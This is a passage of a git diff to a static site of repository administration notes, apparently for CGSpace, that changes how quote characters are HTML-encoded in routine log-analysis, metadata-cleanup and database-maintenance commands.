'{print $9}' | sort | uniq -c | sort -n | tail -n 5 +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 4432 200 </code></pre><ul> <li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> <li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d </code></pre> @@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week 
from 250% to 275%—I might need to increase it again!</li> <li>The top IPs before, during, and after this latest alert tonight were:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 245 207.46.13.5 332 54.70.40.11 385 5.143.231.38 @@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> <li>There were just over 3 million accesses in the nginx logs last month:</li> </ul> -<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot; +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; 3018243 real 0m19.873s @@ -844,7 +844,7 @@ sys 0m1.979s <li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> <li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 92 40.77.167.4 99 210.7.29.100 120 38.126.157.45 @@ -979,7 +979,7 @@ sys 0m1.979s <li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a 
href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> <li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n </code></pre><ul> <li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> <li>Time to index ~70,000 items on CGSpace:</li> @@ -1073,11 +1073,11 @@ sys 2m7.289s <li>I notice this error quite a few times in dspace.log:</li> </ul> <pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. 
</code></pre><ul> <li>And there are many of these errors every day for the past month:</li> </ul> -<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.* +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34 <ul> <li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> </ul> -<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log 0 </code></pre><ul> <li>Generate list of authors on CGSpace for Peter to go through and correct:</li> </ul> -<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; COPY 54701 </code></pre> @@ -1289,7 +1289,7 @@ COPY 54701 <li>Remove redundant/duplicate text in the DSpace submission license</li> <li>Testing the CMYK patch on a collection with 650 items:</li> </ul> -<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt 
</code></pre> @@ -1330,7 +1330,7 @@ COPY 54701 <ul> <li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> </ul> -<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278'; +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; id | collection_id | item_id -------+---------------+--------- 92551 | 313 | 80278 @@ -1370,11 +1370,11 @@ DELETE 1 <li>CGSpace was down for five hours in the morning while I was sleeping</li> <li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> </ul> -<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN 
com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, 
TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) </code></pre><ul> <li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> <li>I&rsquo;ve raised a ticket with Atmire to ask</li> @@ -1429,7 +1429,7 @@ DELETE 1 <li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> <li>It looks like we might be able to use OUs now, instead of DCs:</li> </ul> -<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot; +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; </code></pre> @@ -1465,9 +1465,9 @@ $ git rebase -i dspace-5.5 <li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a 
href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> <li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> </ul> -<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; UPDATE 95 -dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; text_value ------------ (0 rows) @@ -1505,7 +1505,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>I have blocked access to the API now</li> <li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> </ul> -<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l 3168 </code></pre> @@ -1603,7 +1603,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>Looks like DSpace exhausted its PostgreSQL connection pool</li> <li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> </ul> -<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace 78 </code></pre> diff --git a/docs/page/2/index.html b/docs/page/2/index.html index 4a26a119b..b25630012 100644 --- a/docs/page/2/index.html +++ 
b/docs/page/2/index.html @@ -10,14 +10,14 @@ - + - + @@ -221,17 +221,17 @@
• I had a call with CodeObia to discuss the work on OpenRXV
• Check the results of the AReS harvesting from last night:
-
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
-{
-  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                                              +{
                                                                                                                                                                                                                                                                                                                                                                                                                              +  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                                              +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                                              +  }
                                                                                                                                                                                                                                                                                                                                                                                                                              +}
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              Read more → diff --git a/docs/page/3/index.html b/docs/page/3/index.html index 1b00b1891..b3988b8d9 100644 --- a/docs/page/3/index.html +++ b/docs/page/3/index.html @@ -10,14 +10,14 @@ - + - + diff --git a/docs/page/4/index.html b/docs/page/4/index.html index 958fc43d2..c6ffcaae3 100644 --- a/docs/page/4/index.html +++ b/docs/page/4/index.html @@ -10,14 +10,14 @@ - + - + @@ -113,17 +113,17 @@
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                           4671942
                                                                                                                                                                                                                                                                                                                                                                                                                          -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                           1277694
                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                          • So 4.6 million from XMLUI and another 1.2 million from API requests
                                                                                                                                                                                                                                                                                                                                                                                                                          • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                           1183456 
                                                                                                                                                                                                                                                                                                                                                                                                                          -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                           106781
                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                          Read more → @@ -143,7 +143,7 @@

                                                                                                                                                                                                                                                                                                                                                                                                                          - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. Read more → @@ -166,7 +166,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                        • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
                                                                                                                                                                                                                                                                                                                                                                                                                        • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                             440 17.58.101.255
                                                                                                                                                                                                                                                                                                                                                                                                                             441 157.55.39.101
                                                                                                                                                                                                                                                                                                                                                                                                                             485 207.46.13.43
                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -177,7 +177,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                             814 207.46.13.212
                                                                                                                                                                                                                                                                                                                                                                                                                            2472 163.172.71.23
                                                                                                                                                                                                                                                                                                                                                                                                                            6092 3.94.211.189
                                                                                                                                                                                                                                                                                                                                                                                                                        -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                        +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                              33 2a01:7e00::f03c:91ff:fe16:fcb
                                                                                                                                                                                                                                                                                                                                                                                                                              57 3.83.192.124
                                                                                                                                                                                                                                                                                                                                                                                                                              57 3.87.77.25
                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -338,16 +338,16 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                        4432 200
                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                    • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
                                                                                                                                                                                                                                                                                                                                                                                                                    • Apply country and region corrections and deletions on DSpace Test and CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                    Read more → @@ -403,7 +403,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
                                                                                                                                                                                                                                                                                                                                                                                                                  • The top IPs before, during, and after this latest alert tonight were:
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                       245 207.46.13.5
                                                                                                                                                                                                                                                                                                                                                                                                                       332 54.70.40.11
                                                                                                                                                                                                                                                                                                                                                                                                                       385 5.143.231.38
                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -419,7 +419,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
                                                                                                                                                                                                                                                                                                                                                                                                                • There were just over 3 million accesses in the nginx logs last month:
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                 3018243
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 real    0m19.873s
                                                                                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/page/5/index.html b/docs/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                index 68a22b563..e9e7b1766 100644
                                                                                                                                                                                                                                                                                                                                                                                                                --- a/docs/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                +++ b/docs/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                @@ -10,14 +10,14 @@
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                @@ -110,7 +110,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                              • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
                                                                                                                                                                                                                                                                                                                                                                                                              • I don’t see anything interesting in the web server logs around that time though:
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                              # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                              # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                    92 40.77.167.4
